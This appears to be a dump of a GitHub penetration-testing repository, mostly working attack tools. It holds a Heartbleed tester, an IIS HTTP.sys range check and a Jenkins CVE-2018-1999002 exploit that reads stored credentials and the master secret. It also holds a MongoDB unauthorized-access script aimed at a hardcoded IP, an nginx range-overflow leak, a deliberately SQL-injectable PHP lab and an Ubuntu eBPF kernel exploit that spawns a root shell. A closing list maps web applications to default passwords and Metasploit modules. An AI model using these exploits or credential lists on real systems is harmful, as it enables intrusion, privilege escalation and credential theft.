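        r, w, e = select.select([s], [], [], rtime)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    """Read one TLS record and return (type, version, payload).

    Returns (None, None, None) if the connection closes mid-record.
    """
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    """Send the malformed heartbeat and classify the reply.

    Returns True when a heartbeat record (type 24) comes back -- the server
    is reported vulnerable if it carries more than the 3 bytes sent --
    and False on an alert (type 21) or a closed connection.
    """
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.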
127 | if typ == 22 and ord(pay[0]) == 0x0E: 128 | break 129 | 130 | print 'Sending heartbeat request...' 131 | sys.stdout.flush() 132 | s.send(hb) 133 | hit_hb(s) 134 | 135 | if __name__ == '__main__': 136 | main() 137 | -------------------------------------------------------------------------------- /http_sys_test.py: -------------------------------------------------------------------------------- 1 | #sutff.py 2 | import socket 3 | import random 4 | 5 | ipAddr = "这里填入检测IP地址" 6 | hexAllFfff = "18446744073709551615" 7 | 8 | req1 = "GET / HTTP/1.0\r\n\r\n" 9 | req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" 10 | 11 | print "[*] Audit Started" 12 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | client_socket.connect((ipAddr, 80)) 14 | client_socket.send(req1) 15 | boringResp = client_socket.recv(1024) 16 | if "Microsoft" not in boringResp: 17 | print "[*] Not IIS" 18 | exit(0) 19 | client_socket.close() 20 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | client_socket.connect((ipAddr, 80)) 22 | client_socket.send(req) 23 | goodResp = client_socket.recv(1024) 24 | if "Requested Range Not Satisfiable" in goodResp: 25 | print "[!!] 
Looks VULN" 26 | elif " The request has an invalid header name" in goodResp: 27 | print "[*] Looks Patched" 28 | else: 29 | print "[*] Unexpected response, cannot discern patch status" -------------------------------------------------------------------------------- /java_RMI/attackRMI.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/java_RMI/attackRMI.jar -------------------------------------------------------------------------------- /java_RMI/e8f31202-138f-4a60-adb1-114cce64afe1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/java_RMI/e8f31202-138f-4a60-adb1-114cce64afe1.jpg -------------------------------------------------------------------------------- /java_RMI/readme.md: -------------------------------------------------------------------------------- 1 | ### use : java -jar attackRMI ip:port 2 | 3 | ![](https://raw.githubusercontent.com/imr10/Pentest_T00ls/master/java_RMI/e8f31202-138f-4a60-adb1-114cce64afe1.jpg) 4 | -------------------------------------------------------------------------------- /jenkins_file_read/cve-2018-1999002.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import os 4 | import re 5 | 6 | 7 | 8 | def get_mes(host): 9 | num = 0 10 | url_pwd = host+'/plugin/jquery-detached/.xml' 11 | header_pwd = {'Accept-Language':'/../../../credentials'} 12 | url_hash = host+'/plugin/jquery-detached/.key' 13 | header_hash = {'Accept-Language':'/../../../secrets/master'} 14 | try: 15 | content_pwd = requests.get(url_pwd,headers=header_pwd,timeout=5).content 16 | pat_content = r'(.*?)' 17 | pat_user = r'(.*?)' 18 | pat_pwd = r'(.*)' 19 | content_part = re.findall(pat_content,content_pwd,re.S) 20 | for i in content_part: 21 | #print 
i 22 | i = i.replace('\n','') 23 | #print i 24 | users = re.findall(pat_user,i,re.S) 25 | pwds = re.findall(pat_pwd,i) 26 | print users[0]+' '+pwds[0] 27 | content_hash = requests.get(url_hash,headers=header_hash,timeout=5).content 28 | print '\nThe hash is :\n'+content_hash 29 | except Exception,e: 30 | print e 31 | pass 32 | 33 | 34 | if __name__=="__main__": 35 | if len(sys.argv) != 2: 36 | print 'usage:\n\tpython cve-2018-1999002.py [jenkins base url]' 37 | print 'exemple:\n\tpython cve-2018-1999002.py http://localhost:8080/' 38 | sys.exit(1) 39 | host = sys.argv[1] 40 | header_ini = {'Accept-Language':'/../../../../../../../../../windows/win'} 41 | url_ini = host+'/plugin/credentials/.ini' 42 | try: 43 | content_ini = requests.get(url_ini,headers=header_ini,timeout=5).content 44 | if 'for 16-bit app support' in content_ini: 45 | print host+' is Vulnerable\n' 46 | get_mes(host) 47 | else: 48 | print host+' is not Vulnerable\n' 49 | except Exception,e: 50 | print e 51 | print "Url connects error" 52 | -------------------------------------------------------------------------------- /jenkins_file_read/readme.md: -------------------------------------------------------------------------------- 1 | ## use: python *.py http://ip:port 2 | -------------------------------------------------------------------------------- /mongodb_unauth_access.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.7 2 | #coding:utf-8 3 | 4 | import pymongo 5 | from dummy import * 6 | 7 | info = { 8 | 'NAME':'MongoDB Unauthorized Access', 9 | 'AUTHOR':'yangbh', 10 | 'TIME':'20141112', 11 | 'WEB':'http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/2470', 12 | 'DESCRIPTION':'MongoDB配置不当导致未授权访问' 13 | } 14 | opts = { 15 | 'ip':'221.123.140.66', #'target ip' 16 | 'ports':[27017], 17 | } 18 | # opts = [ 19 | # ['ip','221.123.140.66','target ip'], 20 | # ['ports',[27017],'target ip\'s ports'] 21 | # ] 22 | 23 | def Assign(services): 
24 | if services.has_key('ip') and services.has_key('ports'): 25 | return True 26 | return False 27 | 28 | def Audit(services): 29 | port = None 30 | ip = services['ip'] 31 | if 27017 in services['ports']: 32 | port = 27017 33 | elif 28017 in services['ports']: 34 | port = 28017 35 | if port: 36 | try: 37 | connection = pymongo.MongoClient(ip,port,socketTimeoutMS=3000) 38 | # connection.api.authenticate("root","1234") 39 | # db = connection.admin 40 | # db.system.users.find_one() 41 | dbs = connection.database_names() 42 | security_hole(ip+':'+str(port)+'/'+str(dbs)) 43 | logger(ip + ':' + str(port)+'/'+str(dbs)) 44 | except pymongo.errors.OperationFailure,e: 45 | logger('Exception:\t'+str(e)) 46 | # pass 47 | 48 | # ---------------------------------------------------------------------------------------------------- 49 | # untest yet 50 | # ---------------------------------------------------------------------------------------------------- 51 | if __name__=='__main__': 52 | ip ='www.eguan.cn' 53 | if len(sys.argv) == 2: 54 | ip = sys.argv[1] 55 | services = {'ip':ip,'ports':[27017]} 56 | Audit(services) 57 | pprint(services) 58 | -------------------------------------------------------------------------------- /nginx_range_overflow_cve-2017-7529.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # use: python3 poc.py http://xxx.com:8080 3 | import sys 4 | import requests 5 | 6 | if len(sys.argv) < 2: 7 | print("%s url" % (sys.argv[0])) 8 | print("eg: python %s http://your-ip:8080/" % (sys.argv[0])) 9 | sys.exit() 10 | 11 | headers = { 12 | 'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" 13 | } 14 | offset = 605 15 | url = sys.argv[1] 16 | file_len = len(requests.get(url, headers=headers).content) 17 | n = file_len + offset 18 | headers['Range'] = "bytes=-%d,-%d" % ( 19 | n, 0x8000000000000000 - n) 20 | 21 | r = 
requests.get(url, headers=headers) 22 | print(r.text) 23 | -------------------------------------------------------------------------------- /sqlinject/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/sqlinject/.DS_Store -------------------------------------------------------------------------------- /sqlinject/README.txt: -------------------------------------------------------------------------------- 1 | 修改conn.php 里面账号密码然后导入test.sql到数据库。 2 | -------------------------------------------------------------------------------- /sqlinject/admin.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 管理员登录 5 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 |




60 | 61 |
62 | 63 | 用户名: 64 | 65 |
66 | 密    码: 67 | 68 |
69 | 70 | 71 |
72 | 73 | -------------------------------------------------------------------------------- /sqlinject/admin_login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/sqlinject/admin_login.php -------------------------------------------------------------------------------- /sqlinject/conn.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmgy10/Pentest/5471245302db8c91cb2113aee1bfd1162ea29aca/sqlinject/conn.php -------------------------------------------------------------------------------- /sqlinject/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | sql注入测试 5 | 8 | 9 | 10 | 11 |
12 | error:'.mysql_error().'

'); 24 | } 25 | echo "sql注入测试
"; 26 | echo ""; 27 | echo ""; 28 | echo ""; 29 | echo ""; 30 | echo ""; 31 | //遍历查询结果 32 | while ($row = mysql_fetch_array($result)) 33 | { 34 | if (!$row){ 35 | echo "该记录不存在"; 36 | exit; 37 | } 38 | echo ""; 39 | echo ""; 40 | echo ""; 41 | echo ""; 42 | echo ""; 43 | } 44 | echo ""; 45 | echo "
id标题内容
".$row[0]."".$row[1]."".$row[2]."
sql语句: >".$sql."
"; 46 | ?> 47 | 点我进入后台       48 | md5解密可以点我 49 | 50 | -------------------------------------------------------------------------------- /sqlinject/test.sql: -------------------------------------------------------------------------------- 1 | -- phpMyAdmin SQL Dump 2 | -- version phpStudy 2014 3 | -- http://www.phpmyadmin.net 4 | -- 5 | -- 主机: localhost 6 | -- 生成日期: 2016 年 05 月 31 日 14:16 7 | -- 服务器版本: 5.5.47 8 | -- PHP 版本: 5.3.29 9 | 10 | SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; 11 | SET time_zone = "+00:00"; 12 | 13 | 14 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 15 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 16 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 17 | /*!40101 SET NAMES utf8 */; 18 | 19 | -- 20 | -- 数据库: `test` 21 | -- 22 | 23 | -- -------------------------------------------------------- 24 | 25 | -- 26 | -- 表的结构 `admin` 27 | -- 28 | 29 | CREATE TABLE IF NOT EXISTS `admin` ( 30 | `id` int(3) NOT NULL AUTO_INCREMENT, 31 | `user` varchar(10) COLLATE utf8_unicode_ci NOT NULL, 32 | `pwd` varchar(32) COLLATE utf8_unicode_ci NOT NULL, 33 | PRIMARY KEY (`id`) 34 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=2 ; 35 | 36 | -- 37 | -- 转存表中的数据 `admin` 38 | -- 39 | 40 | INSERT INTO `admin` (`id`, `user`, `pwd`) VALUES 41 | (1, 'admin', '3f230640b78d7e71ac5514e57935eb69'); 42 | 43 | -- -------------------------------------------------------- 44 | 45 | -- 46 | -- 表的结构 `sqltest` 47 | -- 48 | 49 | CREATE TABLE IF NOT EXISTS `sqltest` ( 50 | `id` int(11) NOT NULL AUTO_INCREMENT, 51 | `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '', 52 | `content` text CHARACTER SET utf8 NOT NULL, 53 | PRIMARY KEY (`id`) 54 | ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ; 55 | 56 | -- 57 | -- 转存表中的数据 `sqltest` 58 | -- 59 | 60 | INSERT INTO `sqltest` (`id`, `title`, `content`) VALUES 61 | (1, '第一个', '这是ID=1的数据\r\n1111111111111111111111111111111111111111'), 62 | (2, 
'第二个', '这是ID=2的数据\r\n2222222222222222222222222222222222222222'), 63 | (3, '第三个', '这是ID=3的数据\r\n3333333333333333333333333333333333333333'); 64 | 65 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 66 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 67 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 68 | -------------------------------------------------------------------------------- /ubuntu_tiquan.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Ubuntu 16.04.4 kernel priv esc 3 | * 4 | * all credits to @bleidl 5 | * - vnik 6 | * use: gcc -o tiquan ubuntu_tiquan.c 7 | * ./tiquan 8 | */ 9 | 10 | // Tested on: 11 | // 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 12 | // if different kernel adjust CRED offset + check kernel stack size 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | #define PHYS_OFFSET 0xffff880000000000 29 | #define CRED_OFFSET 0x5f8 30 | #define UID_OFFSET 4 31 | #define LOG_BUF_SIZE 65536 32 | #define PROGSIZE 328 33 | 34 | int sockets[2]; 35 | int mapfd, progfd; 36 | 37 | char *__prog = "\xb4\x09\x00\x00\xff\xff\xff\xff" 38 | "\x55\x09\x02\x00\xff\xff\xff\xff" 39 | "\xb7\x00\x00\x00\x00\x00\x00\x00" 40 | "\x95\x00\x00\x00\x00\x00\x00\x00" 41 | "\x18\x19\x00\x00\x03\x00\x00\x00" 42 | "\x00\x00\x00\x00\x00\x00\x00\x00" 43 | "\xbf\x91\x00\x00\x00\x00\x00\x00" 44 | "\xbf\xa2\x00\x00\x00\x00\x00\x00" 45 | "\x07\x02\x00\x00\xfc\xff\xff\xff" 46 | "\x62\x0a\xfc\xff\x00\x00\x00\x00" 47 | "\x85\x00\x00\x00\x01\x00\x00\x00" 48 | "\x55\x00\x01\x00\x00\x00\x00\x00" 49 | "\x95\x00\x00\x00\x00\x00\x00\x00" 50 | "\x79\x06\x00\x00\x00\x00\x00\x00" 51 | "\xbf\x91\x00\x00\x00\x00\x00\x00" 52 | "\xbf\xa2\x00\x00\x00\x00\x00\x00" 53 | "\x07\x02\x00\x00\xfc\xff\xff\xff" 54 | 
"\x62\x0a\xfc\xff\x01\x00\x00\x00" 55 | "\x85\x00\x00\x00\x01\x00\x00\x00" 56 | "\x55\x00\x01\x00\x00\x00\x00\x00" 57 | "\x95\x00\x00\x00\x00\x00\x00\x00" 58 | "\x79\x07\x00\x00\x00\x00\x00\x00" 59 | "\xbf\x91\x00\x00\x00\x00\x00\x00" 60 | "\xbf\xa2\x00\x00\x00\x00\x00\x00" 61 | "\x07\x02\x00\x00\xfc\xff\xff\xff" 62 | "\x62\x0a\xfc\xff\x02\x00\x00\x00" 63 | "\x85\x00\x00\x00\x01\x00\x00\x00" 64 | "\x55\x00\x01\x00\x00\x00\x00\x00" 65 | "\x95\x00\x00\x00\x00\x00\x00\x00" 66 | "\x79\x08\x00\x00\x00\x00\x00\x00" 67 | "\xbf\x02\x00\x00\x00\x00\x00\x00" 68 | "\xb7\x00\x00\x00\x00\x00\x00\x00" 69 | "\x55\x06\x03\x00\x00\x00\x00\x00" 70 | "\x79\x73\x00\x00\x00\x00\x00\x00" 71 | "\x7b\x32\x00\x00\x00\x00\x00\x00" 72 | "\x95\x00\x00\x00\x00\x00\x00\x00" 73 | "\x55\x06\x02\x00\x01\x00\x00\x00" 74 | "\x7b\xa2\x00\x00\x00\x00\x00\x00" 75 | "\x95\x00\x00\x00\x00\x00\x00\x00" 76 | "\x7b\x87\x00\x00\x00\x00\x00\x00" 77 | "\x95\x00\x00\x00\x00\x00\x00\x00"; 78 | 79 | char bpf_log_buf[LOG_BUF_SIZE]; 80 | 81 | static int bpf_prog_load(enum bpf_prog_type prog_type, 82 | const struct bpf_insn *insns, int prog_len, 83 | const char *license, int kern_version) { 84 | union bpf_attr attr = { 85 | .prog_type = prog_type, 86 | .insns = (__u64)insns, 87 | .insn_cnt = prog_len / sizeof(struct bpf_insn), 88 | .license = (__u64)license, 89 | .log_buf = (__u64)bpf_log_buf, 90 | .log_size = LOG_BUF_SIZE, 91 | .log_level = 1, 92 | }; 93 | 94 | attr.kern_version = kern_version; 95 | 96 | bpf_log_buf[0] = 0; 97 | 98 | return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); 99 | } 100 | 101 | static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, 102 | int max_entries) { 103 | union bpf_attr attr = { 104 | .map_type = map_type, 105 | .key_size = key_size, 106 | .value_size = value_size, 107 | .max_entries = max_entries 108 | }; 109 | 110 | return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); 111 | } 112 | 113 | static int bpf_update_elem(uint64_t key, 
uint64_t value) { 114 | union bpf_attr attr = { 115 | .map_fd = mapfd, 116 | .key = (__u64)&key, 117 | .value = (__u64)&value, 118 | .flags = 0, 119 | }; 120 | 121 | return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); 122 | } 123 | 124 | static int bpf_lookup_elem(void *key, void *value) { 125 | union bpf_attr attr = { 126 | .map_fd = mapfd, 127 | .key = (__u64)key, 128 | .value = (__u64)value, 129 | }; 130 | 131 | return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); 132 | } 133 | 134 | static void __exit(char *err) { 135 | fprintf(stderr, "error: %s\n", err); 136 | exit(-1); 137 | } 138 | 139 | static void prep(void) { 140 | mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3); 141 | if (mapfd < 0) 142 | __exit(strerror(errno)); 143 | 144 | progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, 145 | (struct bpf_insn *)__prog, PROGSIZE, "GPL", 0); 146 | 147 | if (progfd < 0) 148 | __exit(strerror(errno)); 149 | 150 | if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) 151 | __exit(strerror(errno)); 152 | 153 | if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) 154 | __exit(strerror(errno)); 155 | } 156 | 157 | static void writemsg(void) { 158 | char buffer[64]; 159 | 160 | ssize_t n = write(sockets[0], buffer, sizeof(buffer)); 161 | 162 | if (n < 0) { 163 | perror("write"); 164 | return; 165 | } 166 | if (n != sizeof(buffer)) 167 | fprintf(stderr, "short write: %lu\n", n); 168 | } 169 | 170 | #define __update_elem(a, b, c) \ 171 | bpf_update_elem(0, (a)); \ 172 | bpf_update_elem(1, (b)); \ 173 | bpf_update_elem(2, (c)); \ 174 | writemsg(); 175 | 176 | static uint64_t get_value(int key) { 177 | uint64_t value; 178 | 179 | if (bpf_lookup_elem(&key, &value)) 180 | __exit(strerror(errno)); 181 | 182 | return value; 183 | } 184 | 185 | static uint64_t __get_fp(void) { 186 | __update_elem(1, 0, 0); 187 | 188 | return get_value(2); 189 | } 190 | 191 | static uint64_t __read(uint64_t addr) { 
192 | __update_elem(0, addr, 0); 193 | 194 | return get_value(2); 195 | } 196 | 197 | static void __write(uint64_t addr, uint64_t val) { 198 | __update_elem(2, addr, val); 199 | } 200 | 201 | static uint64_t get_sp(uint64_t addr) { 202 | return addr & ~(0x4000 - 1); 203 | } 204 | 205 | static void pwn(void) { 206 | uint64_t fp, sp, task_struct, credptr, uidptr; 207 | 208 | fp = __get_fp(); 209 | if (fp < PHYS_OFFSET) 210 | __exit("bogus fp"); 211 | 212 | sp = get_sp(fp); 213 | if (sp < PHYS_OFFSET) 214 | __exit("bogus sp"); 215 | 216 | task_struct = __read(sp); 217 | 218 | if (task_struct < PHYS_OFFSET) 219 | __exit("bogus task ptr"); 220 | 221 | printf("task_struct = %lx\n", task_struct); 222 | 223 | credptr = __read(task_struct + CRED_OFFSET); // cred 224 | 225 | if (credptr < PHYS_OFFSET) 226 | __exit("bogus cred ptr"); 227 | 228 | uidptr = credptr + UID_OFFSET; // uid 229 | if (uidptr < PHYS_OFFSET) 230 | __exit("bogus uid ptr"); 231 | 232 | printf("uidptr = %lx\n", uidptr); 233 | __write(uidptr, 0); // set both uid and gid to 0 234 | 235 | if (getuid() == 0) { 236 | printf("spawning root shell\n"); 237 | system("/bin/bash"); 238 | exit(0); 239 | } 240 | 241 | __exit("not vulnerable?"); 242 | } 243 | 244 | int main(int argc, char **argv) { 245 | prep(); 246 | pwn(); 247 | 248 | return 0; 249 | } 250 | -------------------------------------------------------------------------------- /web_path+mima+msf_exp.md: -------------------------------------------------------------------------------- 1 | JBoss jmx-console: 2 | 路径1: '/jmx-console' 3 | 路径2: '/jmx-console/' 4 | 版本: '' 5 | exp: './exploit/multi/http/jboss_deploymentfilerepository' 6 | 默认密码: 'admin:admin' 7 | 8 | Apache Tomcat: 9 | 路径1: '/manager/html' 10 | 路径2: '/manager' 11 | 版本: '' 12 | exp: './exploits/multi/http/tomcat_mgr_upload.rb' 13 | 默认密码: 'tomcat:tomcat' 14 | 15 | Testlink: 16 | 路径1: '/testlink-1.9.3/login.php' 17 | 路径2: '/testlink/login.php' 18 | 版本: '' 19 | exp: 
'./exploits/multi/http/testlink_upload_exec.rb' 20 | 默认密码: 'admin:admin' 21 | 22 | Hudson Jenkins: 23 | 路径1: '/jenkins/login?from=/jenkins/' 24 | 路径2: '/jenkins/' 25 | 版本: '' 26 | exp: './auxiliary/scanner/http/jenkins_enum.rb, ./exploits/multi/http/jenkins_script_console.rb' 27 | 默认密码: 'admin:admin' 28 | 29 | Apache Axis2: 30 | 路径1: '/axis2/axis2-admin' 31 | 路径2: '' 32 | 版本: '' 33 | exp: 'blank' 34 | 默认密码: 'admin:axis2' 35 | 36 | Ektron CMS: 37 | 路径1: '/cms400min/' 38 | 路径2: '' 39 | 版本: '' 40 | exp: './exploits/windows/http/ektron_xslt_exec.rb' 41 | 默认密码: 'admin:admin' 42 | 43 | HP Intelligent Management Center: 44 | 路径1: '/imc' 45 | 路径2: '' 46 | 版本: '' 47 | exp: './exploits/windows/http/hp_imc_mibfileupload.rb, ./auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb' 48 | 默认密码: 'admin:admin' 49 | 50 | Umbraco CMS: 51 | 路径1: '/umbraco/' 52 | 路径2: '' 53 | 版本: '' 54 | exp: './exploits/windows/http/umbraco_upload_aspx.rb' 55 | 默认密码: 'admin:admin' 56 | 57 | Easy File Management Web Server: 58 | 路径1: '/vfolder.ghp' 59 | 路径2: '' 60 | 版本: '' 61 | exp: './exploits/windows/http/efs_fmws_userid_bof.rb' 62 | 默认密码: 'admin:admin' 63 | 64 | VMware ESXi: 65 | 路径1: '/folder?dcPath=ha-datacenter' 66 | 路径2: '/mob' 67 | 版本: '' 68 | exp: '' 69 | 默认密码: 'admin:admin' 70 | 71 | SAP ConfigServlet: 72 | 路径1: '/ctc/servlet' 73 | 路径2: '' 74 | 版本: '' 75 | exp: './exploits/windows/http/sap_configservlet_exec_noauth.rb, ./auxiliary/admin/sap/sap_configservlet_exec_noauth.rb' 76 | 默认密码: 'admin:admin' 77 | 78 | HP SiteScope: 79 | 路径1: '/SiteScope/' 80 | 路径2: '' 81 | 版本: '' 82 | exp: './exploits/windows/http/hp_sitescope_runomagentcommand.rb, ./exploits/multi/http/hp_sitescope_uploadfileshandler.rb, ./exploits/multi/http/hp_sitescope_issuesiebelcmd.rb, ./auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb, ./auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb, ./auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb' 83 | 默认密码: 'admin:admin' 84 | 85 | 
Owl Intranet Engine: 86 | 路径1: '/owl/admin/index.php?userid=1&newuser' 87 | 路径2: '/owl/admin/index.php?userid=1&action=edituser&owluser=1' 88 | 版本: '' 89 | exp: 'https://www.exploit-db.com/exploits/36456/' 90 | 默认密码: 'admin:admin' 91 | 92 | Oracle Endeca Server: 93 | 路径1: '/ws/control' 94 | 路径2: '' 95 | 版本: '' 96 | exp: './exploits/windows/http/oracle_endeca_exec.rb' 97 | 默认密码: 'admin:admin' 98 | 99 | HP AutoPass License Server: 100 | 路径1: '/autopass' 101 | 路径2: '' 102 | 版本: '' 103 | exp: './exploits/windows/http/hp_autopass_license_traversal.rb' 104 | 默认密码: 'admin:admin' 105 | 106 | Dell SonicWALL (Plixer) Scrutinizer: 107 | 路径1: '/d4d/statusFilter.php' 108 | 路径2: '' 109 | 版本: '' 110 | exp: './exploits/windows/http/sonicwall_scrutinizer_sqli.rb' 111 | 默认密码: 'admin:admin' 112 | 113 | v0pCr3w: 114 | 路径1: '/jos.php' 115 | 路径2: '' 116 | 版本: '' 117 | exp: './exploits/multi/http/v0pcr3w_exec.rb' 118 | 默认密码: 'admin:admin' 119 | 120 | Moodle: 121 | 路径1: '/moodle/' 122 | 路径2: '' 123 | 版本: '' 124 | exp: './exploits/multi/http/moodle_cmd_exec.rb' 125 | 默认密码: 'admin:admin' 126 | 127 | Auxilium RateMyPet: 128 | 路径1: '/Auxiliumpetratepro/' 129 | 路径2: '' 130 | 版本: '' 131 | exp: './exploits/multi/http/auxilium_upload_exec.rb' 132 | 默认密码: 'admin:admin' 133 | 134 | STUNSHELL: 135 | 路径1: '/IDC.php' 136 | 路径2: '' 137 | 版本: '' 138 | exp: './exploits/multi/http/stunshell_eval.rb' 139 | 默认密码: 'admin:admin' 140 | 141 | Sflog CMS: 142 | 路径1: '/sflog/' 143 | 路径2: '' 144 | 版本: '' 145 | exp: './exploits/multi/http/sflog_upload_exec.rb' 146 | 默认密码: 'admin:admin' 147 | 148 | Apache Struts: 149 | 路径1: '/struts2-blank/example/HelloWorld.action' 150 | 路径2: '/blank-struts2/login.action' 151 | 版本: '' 152 | exp: './exploits/multi/http/struts_code_exec_classloader.rb, ./exploits/multi/http/struts_code_exec_parameters.rb, ./exploits/multi/http/struts_default_action_mapper.rb' 153 | 默认密码: 'admin:admin' 154 | 155 | Apache Struts: 156 | 路径1: '/blank-struts2/login.action' 157 | 路径2: '' 158 | 版本: '' 159 | 
exp: './exploits/multi/http/struts_code_exec_parameters.rb' 160 | 默认密码: 'admin:admin' 161 | 162 | MobileCartly: 163 | 路径1: '/mobilecartly/' 164 | 路径2: '' 165 | 版本: '' 166 | exp: './exploits/multi/http/mobilecartly_upload_exec.rb' 167 | 默认密码: 'admin:admin' 168 | 169 | MediaWiki: 170 | 路径1: '/mediawiki/index.php?title=Special:UserLogin&returnto=Main_Page' 171 | 路径2: '' 172 | 版本: '' 173 | exp: './exploits/multi/http/mediawiki_thumb.rb' 174 | 默认密码: 'admin:password' 175 | 176 | qdPM: 177 | 路径1: '/qdPM/' 178 | 路径2: '' 179 | 版本: '' 180 | exp: './exploits/multi/http/qdpm_upload_exec.rb' 181 | 默认密码: 'admin:admin' 182 | 183 | WebPageTest: 184 | 路径1: '/gettext.php' 185 | 路径2: '/work/resultimage.php' 186 | 版本: '' 187 | exp: './exploits/multi/http/webpagetest_upload_exec.rb' 188 | 默认密码: 'admin:admin' 189 | 190 | GestioIP: 191 | 路径1: '/gestioip/' 192 | 路径2: '' 193 | 版本: '' 194 | exp: './exploits/multi/http/gestioip_exec.rb' 195 | 默认密码: 'admin:admin' 196 | 197 | PolarBear CMS: 198 | 路径1: '/polarbearcms' 199 | 路径2: '' 200 | 版本: '' 201 | exp: './exploits/multi/http/polarcms_upload_exec.rb' 202 | 默认密码: 'admin:admin' 203 | 204 | JBoss: 205 | 路径1: '/invoker/JMXInvokerServlet' 206 | 路径2: '' 207 | 版本: '' 208 | exp: './exploits/multi/http/jboss_invoke_deploy.rb' 209 | 默认密码: 'admin:admin' 210 | 211 | Log1 CMS: 212 | 路径1: '/log1cms2.0/' 213 | 路径2: '' 214 | 版本: '' 215 | exp: './exploits/multi/http/log1cms_ajax_create_folder.rb' 216 | 默认密码: 'admin:admin' 217 | 218 | WikkaWiki: 219 | 路径1: '/wikka/' 220 | 路径2: '' 221 | 版本: '' 222 | exp: './exploits/multi/http/wikka_spam_exec.rb' 223 | 默认密码: 'admin:admin' 224 | 225 | CuteFlow: 226 | 路径1: '/cuteflow_v.2.11.2/' 227 | 路径2: '' 228 | 版本: '' 229 | exp: './exploits/multi/http/cuteflow_upload_exec.rb' 230 | 默认密码: 